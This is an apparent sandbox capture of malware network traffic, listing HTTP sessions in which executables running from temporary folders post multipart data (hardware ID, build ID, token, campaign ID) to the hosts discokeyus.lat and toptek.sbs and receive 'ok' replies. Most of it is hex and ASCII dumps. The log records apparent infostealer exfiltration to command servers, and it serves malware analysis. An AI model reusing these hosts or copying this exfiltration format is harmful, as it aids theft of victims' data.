                                                                                                                                                                                                                                                            2024-12-21 21:17:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:32 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:34 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-12-21 21:17:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            38192.168.2.449880104.21.21.99443280C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=YIWOPE86IGGU2J83D
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 18157
                                                                                                                                                                                                                                                            Host: discokeyus.lat
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC15331OUTData Raw: 2d 2d 59 49 57 4f 50 45 38 36 49 47 47 55 32 4a 38 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 46 37 41 44 32 31 46 43 39 39 30 44 34 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 49 57 4f 50 45 38 36 49 47 47 55 32 4a 38 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 49 57 4f 50 45 38 36 49 47 47 55 32 4a 38 33 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                                                                                                                                                                            Data Ascii: --YIWOPE86IGGU2J83DContent-Disposition: form-data; name="hwid"ACBF7AD21FC990D4AC8923850305D13E--YIWOPE86IGGU2J83DContent-Disposition: form-data; name="pid"2--YIWOPE86IGGU2J83DContent-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC2826OUTData Raw: 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af
                                                                                                                                                                                                                                                            Data Ascii: 5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC1124INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=n6l1s7hae4r5gmunfn68acqfqc; expires=Wed, 16 Apr 2025 15:04:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l7XEz13fLmyy5sdR9xEg2z2v4jUzA35YsYweDfzedMT5Zyhs9c8e9KSXpwngKH8b6z96NIgwV7MWhYRjW97rvTEu26iICm31Txq2KgRncumGeboQ237c6I3kskPRYcqmBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f5ae6591b1e8c17-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1965&rtt_var=746&sent=17&recv=23&lost=0&retrans=0&sent_bytes=2832&recv_bytes=19116&delivery_rate=1457813&cwnd=240&unsent_bytes=0&cid=afc31822cdf54df9&ts=1862&x=0"
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            39192.168.2.44988194.130.188.574432792C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DJMYUAAS26FUAAS0HVS0
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                            Host: toptek.sbs
                                                                                                                                                                                                                                                            Content-Length: 153381
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 4a 4d 59 55 41 41 53 32 36 46 55 41 41 53 30 48 56 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 33 64 62 62 38 36 33 66 65 33 63 37 33 62 36 36 32 62 36 31 63 63 65 30 34 38 33 32 65 62 32 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 4d 59 55 41 41 53 32 36 46 55 41 41 53 30 48 56 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 44 4a 4d 59 55 41 41 53 32 36 46 55 41 41 53 30 48 56 53 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------DJMYUAAS26FUAAS0HVS0Content-Disposition: form-data; name="token"53dbb863fe3c73b662b61cce04832eb2------DJMYUAAS26FUAAS0HVS0Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------DJMYUAAS26FUAAS0HVS0Cont
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:35 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                            2024-12-21 21:17:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:37 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
